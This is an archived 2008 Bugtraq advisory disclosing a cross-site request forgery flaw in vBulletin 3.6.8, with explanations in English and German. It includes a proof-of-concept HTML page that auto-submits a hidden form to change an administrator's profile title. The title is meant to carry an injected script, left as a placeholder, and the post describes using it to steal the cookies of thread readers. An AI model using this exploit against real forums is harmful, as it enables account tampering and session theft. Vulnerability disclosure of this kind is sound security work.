lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Message-Id: <200801052246.14401.nbbn@gmx.net>
Date: Sat, 5 Jan 2008 22:46:14 +0100
From: nbbn@....net
To: bugtraq@...urityfocus.com
Subject: vBulletin 3.6.8 XSRF/XSS Vulnerability

###############################################################
Autor: NBBN
Founded: 5,  January 2008
vBulletin Version: 3.6.8 Patch Level x and possible lower
Type: XSRF/XSS 
Risk: Medium
###############################################################

##Explanation(english)##

My english is bad, but I try :-) . vBulletin 3.6.8 is XSRF vulnurable. 
Administrators can use html in there own usertitle. 
An attacker can  update the profile of an administrator by sending a link to a 
site with a code like this:


 <html>
  <head></head>
  <body onLoad=javascript:document.form.submit()>

<form action="http://domain.tld/[path]/vBulletin/profile.php?do=updateprofile" 
method="POST" name="form">

<input type="hidden" name="s" value="">
<input type="hidden" name="do" value="updateprofile">
<input type="hidden" name="customtext" value="###########XSS CODE#########"> 
<!-- Attacker's XSS Code -->
<input type="hidden" name="month" value="-1">
<input type="hidden" name="day" value="-1">
<input type="hidden" name="year" value="">
<input type="hidden" name="oldbirthday" value="">
<input type="hidden" name="showbirthday" value="2">
<input type="hidden" name="homepage" value="">
<input type="hidden" name="icq" value="">
<input type="hidden" name="aim" value="">
<input type="hidden" name="msn" value="">
<input type="hidden" name="yahoo" value="">
<input type="hidden" name="skype" value="">
</form>
</body>
</html>

If an attacker send a link in a  pm for example,  to the admin with a site 
like the example code, the admin's usertitle updating and have a the code of 
the attacker.The code  executing if the admin have a post done in a thread 
etc. An attacker can use this to steal the cookie of all user's who are 
reading the thread.


##Explanation(Deutsch/German)##:

In vBulletin 3.6.8 gibt es eine XSRF Lücke, die dazu benutzt werden kann, um 
XSS Code auszuführen. Admins können in ihren eigenen Benutzerrang HTML Code 
verwenden. Das kann ein Angreifer ausnutzen um beliebigen html/javascript 
code auszuführen, wenn er den oben stehenden code in eine Seite packt und 
dann dem Admin eine Private Nachricht sendet, mit einem Link zu einer Seite 
mit dem obigen HTML-Code. Somit ist es dem Angreifer möglich, alle Cookies 
von den Benutzern zu klauen, die gerade einen Thread lesen,in welchem ein 
Administrator gepostet hat.

 








Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ